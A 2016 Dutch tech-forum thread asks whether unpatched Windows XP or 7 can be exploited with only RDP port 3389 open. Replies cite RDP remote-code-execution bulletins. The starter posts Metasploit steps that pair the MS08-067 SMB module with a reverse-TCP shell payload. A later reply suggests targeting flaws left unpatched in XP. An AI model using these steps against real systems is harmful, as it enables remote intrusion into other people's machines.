Toon posts:

Windows XP, 7 of 10 exploiteren met open 3389 poort?

Pagina: 1
Acties:

vrijdag 23 september 2016 20:34

Acties:

Verwijderd

Topicstarter
Dag allen,

Een stomme vraag maybe.
Maar ik zit met een uitdaging.

Kun je een Windows XP, 7 of 8/10 exploiteren met een exploit, als alleen de 3889 (rdp) poort open is?

Blijft me een raadsel.
Thanks.

vrijdag 23 september 2016 20:38

Acties:
  • Tazzy
  • Registratie: September 2001
  • Laatst online: 17:05

Tazzy

Hangt van het patch level af, maar zou zo even niet weten of dit in 10 bv ook kan.
Google anders ff?

vrijdag 23 september 2016 20:40

Acties:
  • Petervanakelyen
  • Registratie: December 2006
  • Laatst online: 30-04 12:52

Petervanakelyen

Ja, dat kan. Het RDP (Remote Desktop Protocol) heeft al een aantal RCE (Remote Code Execution) exploits gezien, oa MS12-020 en MS15-067. Of dat ook in praktijk te exploiten valt hangt natuurlijk af van je testomgeving.

Somewhere in Texas there's a village missing its idiot.

vrijdag 23 september 2016 20:42

Acties:

Verwijderd

Topicstarter
Hartelijk dank heren.
Heb standaard Windows XP.

En Win 7 x64 ENG zonder ServicePack.

vrijdag 23 september 2016 21:39

Acties:
  • Peetz0r
  • Registratie: Mei 2009
  • Laatst online: 06:12

Peetz0r

Windows XP zeg je?

Ga er maar vanuit dat Windows XP sowieso te exploiten valt, ongeacht of je poort 3389 (of welke dan ook) open hebt staan.

vrijdag 23 september 2016 21:45

Acties:
  • .Maarten
  • Registratie: Januari 2011
  • Laatst online: 17:06

.Maarten

En voor w7 zonder sp vast ook wel

vrijdag 23 september 2016 23:22

Acties:

Verwijderd

Topicstarter
Peetz0r schreef op vrijdag 23 september 2016 @ 21:39:
Windows XP zeg je?

Ga er maar vanuit dat Windows XP sowieso te exploiten valt, ongeacht of je poort 3389 (of welke dan ook) open hebt staan.
Nou, ik heb de hoop bijna verloren.
Het lukt mij gewoon niet.

use windows/smb/ms08_067_netapi
en dan payload kiezen

set payload windows/shell/reverse_tcp

set LHOST (dus mijn locale ip, voorheen gecheckt met command ifconfig).
Dan set RHOST

run (of exploit).
maar werkt niet.

zaterdag 24 september 2016 10:16

Acties:
  • Peetz0r
  • Registratie: Mei 2009
  • Laatst online: 06:12

Peetz0r

MS08-067 is een vulnerability uit 2008. Windows XP is end-on-life sinds 2014. Deze is dus gewoon gepatcht in een of andere update van jaren terug.

Probeer eens vulnerabilities van na april 2014. Check ook voor vulnerabilities die aanwezig zijn in XP (en 7, 8 en 10), maar alleen gepatcht zijn in Windows 7 en 8 en 10, en dus niet in XP.
Pagina: 1
Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq